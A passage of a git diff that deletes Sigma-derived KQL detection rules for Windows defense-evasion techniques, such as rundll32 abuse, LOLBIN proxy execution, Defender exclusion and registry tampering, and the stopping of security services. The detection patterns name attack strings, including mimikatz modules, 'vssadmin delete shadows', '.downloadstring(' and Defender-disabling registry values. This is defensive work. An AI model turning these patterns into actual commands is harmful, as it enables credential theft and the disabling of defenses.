".rsp" or (ProcessCommandLine contains ".exe /E /F \"C:\\WINDOWS\\system32\\odbcconf.tmp\"" and FolderPath =~ "C:\\Windows\\System32\\odbcconf.exe" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\runonce.exe")))) \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Rundll32_Activity_Invoking_Sys_File.kql b/Defense Evasion/Suspicious_Rundll32_Activity_Invoking_Sys_File.kql deleted file mode 100644 index 100ed93b..00000000 --- a/Defense Evasion/Suspicious_Rundll32_Activity_Invoking_Sys_File.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2021/03/05 -// Level: high -// Description: Detects suspicious process related to rundll32 based on command line that includes a *.sys file as seen being used by UNC2452 -// Tags: attack.defense_evasion, attack.t1218.011 -DeviceProcessEvents -| where ProcessCommandLine contains "rundll32.exe" and (ProcessCommandLine contains ".sys," or ProcessCommandLine contains ".sys ") \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Rundll32_Execution_With_Image_Extension.kql b/Defense Evasion/Suspicious_Rundll32_Execution_With_Image_Extension.kql deleted file mode 100644 index 2167b106..00000000 --- a/Defense Evasion/Suspicious_Rundll32_Execution_With_Image_Extension.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Hieu Tran -// Date: 2023/03/13 -// Level: high -// Description: Detects the execution of Rundll32.exe with DLL files masquerading as image files -// Tags: attack.defense_evasion, attack.t1218.011 -DeviceProcessEvents -| where (ProcessCommandLine contains ".bmp" or ProcessCommandLine contains ".cr2" or ProcessCommandLine contains ".eps" or ProcessCommandLine contains ".gif" or ProcessCommandLine contains ".ico" or ProcessCommandLine contains ".jpeg" or ProcessCommandLine contains ".jpg" or ProcessCommandLine contains ".nef" or ProcessCommandLine contains ".orf" or ProcessCommandLine contains ".png" or ProcessCommandLine contains ".raw" or ProcessCommandLine contains ".sr2" or ProcessCommandLine contains ".tif" or ProcessCommandLine contains ".tiff") and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.exe") \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Rundll32_Invoking_Inline_VBScript.kql b/Defense Evasion/Suspicious_Rundll32_Invoking_Inline_VBScript.kql deleted file mode 100644 index 3d521133..00000000 --- a/Defense Evasion/Suspicious_Rundll32_Invoking_Inline_VBScript.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2021/03/05 -// Level: high -// Description: Detects suspicious process related to rundll32 based on command line that invokes inline VBScript as seen being used by UNC2452 -// Tags: attack.defense_evasion, attack.t1055 -DeviceProcessEvents -| where ProcessCommandLine contains "rundll32.exe" and ProcessCommandLine contains "Execute" and ProcessCommandLine contains "RegRead" and ProcessCommandLine contains "window.close" \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Rundll32_Setupapi.dll_Activity.kql b/Defense Evasion/Suspicious_Rundll32_Setupapi.dll_Activity.kql deleted file mode 100644 index c3719d26..00000000 --- a/Defense Evasion/Suspicious_Rundll32_Setupapi.dll_Activity.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Konstantin Grishchenko, oscd.community -// Date: 2020/10/07 -// Level: medium -// Description: setupapi.dll library provide InstallHinfSection function for processing INF files. INF file may contain instructions allowing to create values in the registry, modify files and install drivers. This technique could be used to obtain persistence via modifying one of Run or RunOnce registry keys, run process or use other DLLs chain calls (see references) InstallHinfSection function in setupapi.dll calls runonce.exe executable regardless of actual content of INF file. -// Tags: attack.defense_evasion, attack.t1218.011 -DeviceProcessEvents -| where FolderPath endswith "\\runonce.exe" and (InitiatingProcessCommandLine contains "setupapi.dll" and InitiatingProcessCommandLine contains "InstallHinfSection") and InitiatingProcessFolderPath endswith "\\rundll32.exe" \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Runscripthelper.exe.kql b/Defense Evasion/Suspicious_Runscripthelper.exe.kql deleted file mode 100644 index 568eff5f..00000000 --- a/Defense Evasion/Suspicious_Runscripthelper.exe.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Victor Sergeev, oscd.community -// Date: 2020/10/09 -// Level: medium -// Description: Detects execution of powershell scripts via Runscripthelper.exe -// Tags: attack.execution, attack.t1059, attack.defense_evasion, attack.t1202 -DeviceProcessEvents -| where ProcessCommandLine contains "surfacecheck" and FolderPath endswith "\\Runscripthelper.exe" \ No newline at end of file diff --git a/Defense Evasion/Suspicious_SYSTEM_User_Process_Creation.kql b/Defense Evasion/Suspicious_SYSTEM_User_Process_Creation.kql deleted file mode 100644 index 76673450..00000000 --- a/Defense Evasion/Suspicious_SYSTEM_User_Process_Creation.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), David ANDRE (additional keywords) -// Date: 2021/12/20 -// Level: high -// Description: Detects a suspicious process creation as SYSTEM user (suspicious program or command line parameter) -// Tags: attack.credential_access, attack.defense_evasion, attack.privilege_escalation, attack.t1134, attack.t1003, attack.t1027 -DeviceProcessEvents -| where ((ProcessIntegrityLevel =~ "System" and (AccountName contains "AUTHORI" or AccountName contains "AUTORI")) and ((FolderPath endswith "\\calc.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\hh.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\ping.exe") or (ProcessCommandLine contains " -NoP " or ProcessCommandLine contains " -W Hidden " or ProcessCommandLine contains " -decode " or ProcessCommandLine contains " /decode " or ProcessCommandLine contains " /urlcache " or ProcessCommandLine contains " -urlcache " or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " JAB") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " SUVYI") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " SQBFAFgA") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " aWV4I") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " IAB") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " PAA") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " aQBlAHgA") or ProcessCommandLine contains "vssadmin delete shadows" or ProcessCommandLine contains "reg SAVE HKLM" or ProcessCommandLine contains " -ma " or ProcessCommandLine contains "Microsoft\\Windows\\CurrentVersion\\Run" or ProcessCommandLine contains ".downloadstring(" or ProcessCommandLine contains ".downloadfile(" or ProcessCommandLine contains " /ticket:" or ProcessCommandLine contains "dpapi::" or ProcessCommandLine contains "event::clear" or ProcessCommandLine contains "event::drop" or ProcessCommandLine contains "id::modify" or ProcessCommandLine contains "kerberos::" or ProcessCommandLine contains "lsadump::" or ProcessCommandLine contains "misc::" or ProcessCommandLine contains "privilege::" or ProcessCommandLine contains "rpc::" or ProcessCommandLine contains "sekurlsa::" or ProcessCommandLine contains "sid::" or ProcessCommandLine contains "token::" or ProcessCommandLine contains "vault::cred" or ProcessCommandLine contains "vault::list" or ProcessCommandLine contains " p::d " or ProcessCommandLine contains ";iex(" or ProcessCommandLine contains "MiniDump" or ProcessCommandLine contains "net user "))) and (not((InitiatingProcessFolderPath contains ":\\Packages\\Plugins\\Microsoft.GuestConfiguration.ConfigurationforWindows\\" or (ProcessCommandLine contains " -ma " and (FolderPath contains ":\\Program Files (x86)\\Java\\" or FolderPath contains ":\\Program Files\\Java\\") and FolderPath endswith "\\bin\\jp2launcher.exe" and (InitiatingProcessFolderPath contains ":\\Program Files (x86)\\Java\\" or InitiatingProcessFolderPath contains ":\\Program Files\\Java\\") and InitiatingProcessFolderPath endswith "\\bin\\javaws.exe") or ProcessCommandLine =~ "ping 127.0.0.1 -n 5" or (FolderPath endswith "\\PING.EXE" and InitiatingProcessCommandLine contains "\\DismFoDInstall.cmd")))) \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Scheduled_Task_Creation_via_Masqueraded_XML_File.kql b/Defense Evasion/Suspicious_Scheduled_Task_Creation_via_Masqueraded_XML_File.kql deleted file mode 100644 index 55ba5abb..00000000 --- a/Defense Evasion/Suspicious_Scheduled_Task_Creation_via_Masqueraded_XML_File.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Swachchhanda Shrawan Poudel, Elastic (idea) -// Date: 2023/04/20 -// Level: medium -// Description: Detects the creation of a scheduled task using the "-XML" flag with a file without the '.xml' extension. This behavior could be indicative of potential defense evasion attempt during persistence -// Tags: attack.defense_evasion, attack.persistence, attack.t1036.005, attack.t1053.005 -DeviceProcessEvents -| where ((ProcessCommandLine contains "/create" or ProcessCommandLine contains "-create") and (ProcessCommandLine contains "/xml" or ProcessCommandLine contains "-xml") and (FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe")) and (not((ProcessCommandLine contains ".xml" or ((InitiatingProcessCommandLine contains ":\\WINDOWS\\Installer\\MSI" and InitiatingProcessCommandLine contains ".tmp,zzzzInvokeManagedCustomActionOutOfProc") and InitiatingProcessFolderPath endswith "\\rundll32.exe") or ProcessIntegrityLevel =~ "System"))) and (not(((InitiatingProcessFolderPath contains ":\\ProgramData\\OEM\\UpgradeTool\\CareCenter_" and InitiatingProcessFolderPath contains "\\BUnzip\\Setup_msi.exe") or InitiatingProcessFolderPath endswith ":\\Program Files\\Axis Communications\\AXIS Camera Station\\SetupActions.exe" or InitiatingProcessFolderPath endswith ":\\Program Files\\Axis Communications\\AXIS Device Manager\\AdmSetupActions.exe" or InitiatingProcessFolderPath endswith ":\\Program Files (x86)\\Zemana\\AntiMalware\\AntiMalware.exe" or InitiatingProcessFolderPath endswith ":\\Program Files\\Dell\\SupportAssist\\pcdrcui.exe"))) \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Service_Binary_Directory.kql b/Defense Evasion/Suspicious_Service_Binary_Directory.kql deleted file mode 100644 index 684796f3..00000000 --- a/Defense Evasion/Suspicious_Service_Binary_Directory.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2021/03/09 -// Level: high -// Description: Detects a service binary running in a suspicious directory -// Tags: attack.defense_evasion, attack.t1202 -DeviceProcessEvents -| where (FolderPath contains "\\Users\\Public\\" or FolderPath contains "\\$Recycle.bin" or FolderPath contains "\\Users\\All Users\\" or FolderPath contains "\\Users\\Default\\" or FolderPath contains "\\Users\\Contacts\\" or FolderPath contains "\\Users\\Searches\\" or FolderPath contains "C:\\Perflogs\\" or FolderPath contains "\\config\\systemprofile\\" or FolderPath contains "\\Windows\\Fonts\\" or FolderPath contains "\\Windows\\IME\\" or FolderPath contains "\\Windows\\addins\\") and (InitiatingProcessFolderPath endswith "\\services.exe" or InitiatingProcessFolderPath endswith "\\svchost.exe") \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Service_Installed.kql b/Defense Evasion/Suspicious_Service_Installed.kql deleted file mode 100644 index 72b3dc93..00000000 --- a/Defense Evasion/Suspicious_Service_Installed.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: xknow (@xknow_infosec), xorxes (@xor_xes) -// Date: 2019/04/08 -// Level: medium -// Description: Detects installation of NalDrv or PROCEXP152 services via registry-keys to non-system32 folders. -Both services are used in the tool Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU (https://github.com/hfiref0x/KDU) - -// Tags: attack.t1562.001, attack.defense_evasion -DeviceRegistryEvents -| where (RegistryKey in~ ("HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet001\\Services\\NalDrv\\ImagePath", "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet001\\Services\\PROCEXP152\\ImagePath")) and (not((RegistryValueData contains "\\WINDOWS\\system32\\Drivers\\PROCEXP152.SYS" and (InitiatingProcessFolderPath endswith "\\procexp64.exe" or InitiatingProcessFolderPath endswith "\\procexp.exe" or InitiatingProcessFolderPath endswith "\\procmon64.exe" or InitiatingProcessFolderPath endswith "\\procmon.exe" or InitiatingProcessFolderPath endswith "\\handle.exe" or InitiatingProcessFolderPath endswith "\\handle64.exe")))) \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Sigverif_Execution.kql b/Defense Evasion/Suspicious_Sigverif_Execution.kql deleted file mode 100644 index a4a4205f..00000000 --- a/Defense Evasion/Suspicious_Sigverif_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/08/19 -// Level: medium -// Description: Detects the execution of sigverif binary as a parent process which could indicate it being used as a LOLBIN to proxy execution -// Tags: attack.defense_evasion, attack.t1216 -DeviceProcessEvents -| where InitiatingProcessFolderPath endswith "\\sigverif.exe" \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Splwow64_Without_Params.kql b/Defense Evasion/Suspicious_Splwow64_Without_Params.kql deleted file mode 100644 index 819070d3..00000000 --- a/Defense Evasion/Suspicious_Splwow64_Without_Params.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2021/08/23 -// Level: high -// Description: Detects suspicious Splwow64.exe process without any command line parameters -// Tags: attack.defense_evasion, attack.t1202 -DeviceProcessEvents -| where ProcessCommandLine endswith "splwow64.exe" and FolderPath endswith "\\splwow64.exe" \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Usage_Of_ShellExec_RunDLL.kql b/Defense Evasion/Suspicious_Usage_Of_ShellExec_RunDLL.kql deleted file mode 100644 index 620e4c12..00000000 --- a/Defense Evasion/Suspicious_Usage_Of_ShellExec_RunDLL.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/09/01 -// Level: high -// Description: Detects suspicious usage of the ShellExec_RunDLL function to launch other commands as seen in the the raspberry-robin attack -// Tags: attack.defense_evasion -DeviceProcessEvents -| where ProcessCommandLine contains "ShellExec_RunDLL" and (ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "msiexec" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "odbcconf" or ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "\\Temp\\" or ProcessCommandLine contains "Invoke-" or ProcessCommandLine contains "iex" or ProcessCommandLine contains "comspec") \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Userinit_Child_Process.kql b/Defense Evasion/Suspicious_Userinit_Child_Process.kql deleted file mode 100644 index c667ab72..00000000 --- a/Defense Evasion/Suspicious_Userinit_Child_Process.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), Samir Bousseaden (idea) -// Date: 2019/06/17 -// Level: medium -// Description: Detects a suspicious child process of userinit -// Tags: attack.defense_evasion, attack.t1055 -DeviceProcessEvents -| where InitiatingProcessFolderPath endswith "\\userinit.exe" and (not((ProcessCommandLine contains "\\netlogon\\" or (FolderPath endswith "\\explorer.exe" or ProcessVersionInfoOriginalFileName =~ "explorer.exe")))) \ No newline at end of file diff --git a/Defense Evasion/Suspicious_VBoxDrvInst.exe_Parameters.kql b/Defense Evasion/Suspicious_VBoxDrvInst.exe_Parameters.kql deleted file mode 100644 index b314305f..00000000 --- a/Defense Evasion/Suspicious_VBoxDrvInst.exe_Parameters.kql +++ /dev/null @@ -1,10 +0,0 @@ -// Author: Konstantin Grishchenko, oscd.community -// Date: 2020/10/06 -// Level: medium -// Description: Detect VBoxDrvInst.exe run with parameters allowing processing INF file. -This allows to create values in the registry and install drivers. -For example one could use this technique to obtain persistence via modifying one of Run or RunOnce registry keys - -// Tags: attack.defense_evasion, attack.t1112 -DeviceProcessEvents -| where (ProcessCommandLine contains "driver" and ProcessCommandLine contains "executeinf") and FolderPath endswith "\\VBoxDrvInst.exe" \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Volume_Shadow_Copy_VSS_PS.dll_Load.kql b/Defense Evasion/Suspicious_Volume_Shadow_Copy_VSS_PS.dll_Load.kql deleted file mode 100644 index 714a3039..00000000 --- a/Defense Evasion/Suspicious_Volume_Shadow_Copy_VSS_PS.dll_Load.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Markus Neis, @markus_neis -// Date: 2021/07/07 -// Level: high -// Description: Detects the image load of vss_ps.dll by uncommon executables -// Tags: attack.defense_evasion, attack.impact, attack.t1490 -DeviceImageLoadEvents -| where FolderPath endswith "\\vss_ps.dll" and (not((isnull(InitiatingProcessFolderPath) or ((InitiatingProcessFolderPath endswith "\\clussvc.exe" or InitiatingProcessFolderPath endswith "\\dismhost.exe" or InitiatingProcessFolderPath endswith "\\dllhost.exe" or InitiatingProcessFolderPath endswith "\\inetsrv\\appcmd.exe" or InitiatingProcessFolderPath endswith "\\inetsrv\\iissetup.exe" or InitiatingProcessFolderPath endswith "\\msiexec.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\searchindexer.exe" or InitiatingProcessFolderPath endswith "\\srtasks.exe" or InitiatingProcessFolderPath endswith "\\svchost.exe" or InitiatingProcessFolderPath endswith "\\System32\\SystemPropertiesAdvanced.exe" or InitiatingProcessFolderPath endswith "\\taskhostw.exe" or InitiatingProcessFolderPath endswith "\\thor.exe" or InitiatingProcessFolderPath endswith "\\thor64.exe" or InitiatingProcessFolderPath endswith "\\tiworker.exe" or InitiatingProcessFolderPath endswith "\\vssvc.exe" or InitiatingProcessFolderPath endswith "\\WmiPrvSE.exe" or InitiatingProcessFolderPath endswith "\\wsmprovhost.exe") and InitiatingProcessFolderPath startswith "C:\\Windows\\") or (InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\") or (InitiatingProcessCommandLine contains "\\dismhost.exe {" and InitiatingProcessCommandLine startswith "C:\\$WinREAgent\\Scratch\\")))) \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Volume_Shadow_Copy_Vssapi.dll_Load.kql b/Defense Evasion/Suspicious_Volume_Shadow_Copy_Vssapi.dll_Load.kql deleted file mode 100644 index 76697076..00000000 --- a/Defense Evasion/Suspicious_Volume_Shadow_Copy_Vssapi.dll_Load.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/10/31 -// Level: high -// Description: Detects the image load of VSS DLL by uncommon executables -// Tags: attack.defense_evasion, attack.impact, attack.t1490 -DeviceImageLoadEvents -| where FolderPath endswith "\\vssapi.dll" and (not(((InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\") or InitiatingProcessFolderPath startswith "C:\\ProgramData\\Package Cache\\" or ((InitiatingProcessFolderPath in~ ("C:\\Windows\\explorer.exe", "C:\\Windows\\ImmersiveControlPanel\\SystemSettings.exe")) or (InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\Temp\\{" or InitiatingProcessFolderPath startswith "C:\\Windows\\WinSxS\\"))))) \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Volume_Shadow_Copy_Vsstrace.dll_Load.kql b/Defense Evasion/Suspicious_Volume_Shadow_Copy_Vsstrace.dll_Load.kql deleted file mode 100644 index ddc53c62..00000000 --- a/Defense Evasion/Suspicious_Volume_Shadow_Copy_Vsstrace.dll_Load.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2023/02/17 -// Level: high -// Description: Detects the image load of VSS DLL by uncommon executables -// Tags: attack.defense_evasion, attack.impact, attack.t1490 -DeviceImageLoadEvents -| where FolderPath endswith "\\vsstrace.dll" and (not(((InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\") or ((InitiatingProcessFolderPath in~ ("C:\\Windows\\explorer.exe", "C:\\Windows\\ImmersiveControlPanel\\SystemSettings.exe")) or (InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\Temp\\{" or InitiatingProcessFolderPath startswith "C:\\Windows\\WinSxS\\"))))) \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Vsls-Agent_Command_With_AgentExtensionPath_Load.kql b/Defense Evasion/Suspicious_Vsls-Agent_Command_With_AgentExtensionPath_Load.kql deleted file mode 100644 index e272b115..00000000 --- a/Defense Evasion/Suspicious_Vsls-Agent_Command_With_AgentExtensionPath_Load.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: bohops -// Date: 2022/10/30 -// Level: medium -// Description: Detects Microsoft Visual Studio vsls-agent.exe lolbin execution with a suspicious library load using the --agentExtensionPath parameter -// Tags: attack.defense_evasion, attack.t1218 -DeviceProcessEvents -| where (ProcessCommandLine contains "--agentExtensionPath" and FolderPath endswith "\\vsls-agent.exe") and (not(ProcessCommandLine contains "Microsoft.VisualStudio.LiveShare.Agent.")) \ No newline at end of file diff --git a/Defense Evasion/Suspicious_WMIC_Execution_Via_Office_Process.kql b/Defense Evasion/Suspicious_WMIC_Execution_Via_Office_Process.kql deleted file mode 100644 index bf07a61d..00000000 --- a/Defense Evasion/Suspicious_WMIC_Execution_Via_Office_Process.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Vadim Khrykov, Cyb3rEng -// Date: 2021/08/23 -// Level: high -// Description: Office application called wmic to proxye execution through a LOLBIN process. This is often used to break suspicious parent-child chain (Office app spawns LOLBin). -// Tags: attack.t1204.002, attack.t1047, attack.t1218.010, attack.execution, attack.defense_evasion -DeviceProcessEvents -| where (InitiatingProcessFolderPath endswith "\\WINWORD.EXE" or InitiatingProcessFolderPath endswith "\\EXCEL.EXE" or InitiatingProcessFolderPath endswith "\\POWERPNT.exe" or InitiatingProcessFolderPath endswith "\\MSPUB.exe" or InitiatingProcessFolderPath endswith "\\VISIO.exe" or InitiatingProcessFolderPath endswith "\\MSACCESS.EXE" or InitiatingProcessFolderPath endswith "\\EQNEDT32.EXE" or InitiatingProcessFolderPath endswith "\\ONENOTE.EXE" or InitiatingProcessFolderPath endswith "\\wordpad.exe" or InitiatingProcessFolderPath endswith "\\wordview.exe") and ((ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "msiexec" or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "verclsid" or ProcessCommandLine contains "wscript" or ProcessCommandLine contains "cscript") and (ProcessCommandLine contains "process" and ProcessCommandLine contains "create" and ProcessCommandLine contains "call")) and (FolderPath endswith "\\wbem\\WMIC.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe") \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Windows_Defender_Folder_Exclusion_Added_Via_Reg.EXE.kql b/Defense Evasion/Suspicious_Windows_Defender_Folder_Exclusion_Added_Via_Reg.EXE.kql deleted file mode 100644 index 633e76dc..00000000 --- a/Defense Evasion/Suspicious_Windows_Defender_Folder_Exclusion_Added_Via_Reg.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/02/13 -// Level: medium -// Description: Detects the usage of "reg.exe" to add Defender folder exclusions. Qbot has been seen using this technique to add exclusions for folders within AppData and ProgramData. -// Tags: attack.defense_evasion, attack.t1562.001 -DeviceProcessEvents -| where (ProcessCommandLine contains "SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths" or ProcessCommandLine contains "SOFTWARE\\Microsoft\\Microsoft Antimalware\\Exclusions\\Paths") and (ProcessCommandLine contains "ADD " and ProcessCommandLine contains "/t " and ProcessCommandLine contains "REG_DWORD " and ProcessCommandLine contains "/v " and ProcessCommandLine contains "/d " and ProcessCommandLine contains "0") and FolderPath endswith "\\reg.exe" \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Windows_Defender_Registry_Key_Tampering_Via_Reg.EXE.kql b/Defense Evasion/Suspicious_Windows_Defender_Registry_Key_Tampering_Via_Reg.EXE.kql deleted file mode 100644 index 1e1cc728..00000000 --- a/Defense Evasion/Suspicious_Windows_Defender_Registry_Key_Tampering_Via_Reg.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/03/22 -// Level: high -// Description: Detects the usage of "reg.exe" to tamper with different Windows Defender registry keys in order to disable some important features related to protection and detection -// Tags: attack.defense_evasion, attack.t1562.001 -DeviceProcessEvents -| where ((FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe") and (ProcessCommandLine contains "SOFTWARE\\Microsoft\\Windows Defender\\" or ProcessCommandLine contains "SOFTWARE\\Policies\\Microsoft\\Windows Defender Security Center" or ProcessCommandLine contains "SOFTWARE\\Policies\\Microsoft\\Windows Defender\\")) and (((ProcessCommandLine contains "DisallowExploitProtectionOverride" or ProcessCommandLine contains "EnableControlledFolderAccess" or ProcessCommandLine contains "MpEnablePus" or ProcessCommandLine contains "PUAProtection" or ProcessCommandLine contains "SpynetReporting" or ProcessCommandLine contains "SubmitSamplesConsent" or ProcessCommandLine contains "TamperProtection") and (ProcessCommandLine contains " add " and ProcessCommandLine contains "d 0")) or ((ProcessCommandLine contains "DisableAntiSpyware" or ProcessCommandLine contains "DisableAntiSpywareRealtimeProtection" or ProcessCommandLine contains "DisableAntiVirus" or ProcessCommandLine contains "DisableArchiveScanning" or ProcessCommandLine contains "DisableBehaviorMonitoring" or ProcessCommandLine contains "DisableBlockAtFirstSeen" or ProcessCommandLine contains "DisableConfig" or ProcessCommandLine contains "DisableEnhancedNotifications" or ProcessCommandLine contains "DisableIntrusionPreventionSystem" or ProcessCommandLine contains "DisableIOAVProtection" or ProcessCommandLine contains "DisableOnAccessProtection" or ProcessCommandLine contains "DisablePrivacyMode" or ProcessCommandLine contains "DisableRealtimeMonitoring" or ProcessCommandLine contains "DisableRoutinelyTakingAction" or ProcessCommandLine contains "DisableScanOnRealtimeEnable" or ProcessCommandLine contains "DisableScriptScanning" or ProcessCommandLine contains "Notification_Suppress" or ProcessCommandLine contains "SignatureDisableUpdateOnStartupWithoutEngine") and (ProcessCommandLine contains " add " and ProcessCommandLine contains "d 1"))) \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Windows_Service_Tampering.kql b/Defense Evasion/Suspicious_Windows_Service_Tampering.kql deleted file mode 100644 index 39f2a2c4..00000000 --- a/Defense Evasion/Suspicious_Windows_Service_Tampering.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), frack113 -// Date: 2022/09/01 -// Level: high -// Description: Detects the usage of binaries such as 'net', 'sc' or 'powershell' in order to stop, pause or delete critical or important Windows services such as AV, Backup, etc. As seen being used in some ransomware scripts -// Tags: attack.defense_evasion, attack.t1489 -DeviceProcessEvents -| where (ProcessCommandLine contains "143Svc" or ProcessCommandLine contains "Acronis VSS Provider" or ProcessCommandLine contains "AcronisAgent" or ProcessCommandLine contains "AcrSch2Svc" or ProcessCommandLine contains "Antivirus" or ProcessCommandLine contains "ARSM" or ProcessCommandLine contains "aswBcc" or ProcessCommandLine contains "Avast Business Console Client Antivirus Service" or ProcessCommandLine contains "avast! Antivirus" or ProcessCommandLine contains "AVG Antivirus" or ProcessCommandLine contains "avgAdminClient" or ProcessCommandLine contains "AvgAdminServer" or ProcessCommandLine contains "AVP1" or ProcessCommandLine contains "BackupExec" or ProcessCommandLine contains "bedbg" or ProcessCommandLine contains "BITS" or ProcessCommandLine contains "BrokerInfrastructure" or ProcessCommandLine contains "Client Agent 7.60" or ProcessCommandLine contains "Core Browsing Protection" or ProcessCommandLine contains "Core Mail Protection" or ProcessCommandLine contains "Core Scanning Server" or ProcessCommandLine contains "DCAgent" or ProcessCommandLine contains "EhttpSr" or ProcessCommandLine contains "ekrn" or ProcessCommandLine contains "Enterprise Client Service" or ProcessCommandLine contains "epag" or ProcessCommandLine contains "EPIntegrationService" or ProcessCommandLine contains "EPProtectedService" or ProcessCommandLine contains "EPRedline" or ProcessCommandLine contains "EPSecurityService" or ProcessCommandLine contains "EPUpdateService" or ProcessCommandLine contains "EraserSvc11710" or ProcessCommandLine contains "EsgShKernel" or ProcessCommandLine contains "ESHASRV" or ProcessCommandLine contains "FA_Scheduler" or ProcessCommandLine contains "FirebirdGuardianDefaultInstance" or ProcessCommandLine contains "FirebirdServerDefaultInstance" or ProcessCommandLine contains "HealthTLService" or ProcessCommandLine contains "MSSQLFDLauncher$" or ProcessCommandLine contains "hmpalertsvc" or ProcessCommandLine contains "HMS" or ProcessCommandLine contains "IISAdmin" or ProcessCommandLine contains "IMANSVC" or ProcessCommandLine contains "IMAP4Svc" or ProcessCommandLine contains "KAVFS" or ProcessCommandLine contains "KAVFSGT" or ProcessCommandLine contains "kavfsslp" or ProcessCommandLine contains "klbackupdisk" or ProcessCommandLine contains "klbackupflt" or ProcessCommandLine contains "klflt" or ProcessCommandLine contains "klhk" or ProcessCommandLine contains "KLIF" or ProcessCommandLine contains "klim6" or ProcessCommandLine contains "klkbdflt" or ProcessCommandLine contains "klmouflt" or ProcessCommandLine contains "klnagent" or ProcessCommandLine contains "klpd" or ProcessCommandLine contains "kltap" or ProcessCommandLine contains "KSDE1.0.0" or ProcessCommandLine contains "LogProcessorService" or ProcessCommandLine contains "M8EndpointAgent" or ProcessCommandLine contains "macmnsvc" or ProcessCommandLine contains "masvc" or ProcessCommandLine contains "MBAMService" or ProcessCommandLine contains "MBCloudEA" or ProcessCommandLine contains "MBEndpointAgent" or ProcessCommandLine contains "McAfeeDLPAgentService" or ProcessCommandLine contains "McAfeeEngineService" or ProcessCommandLine contains "MCAFEEEVENTPARSERSRV" or 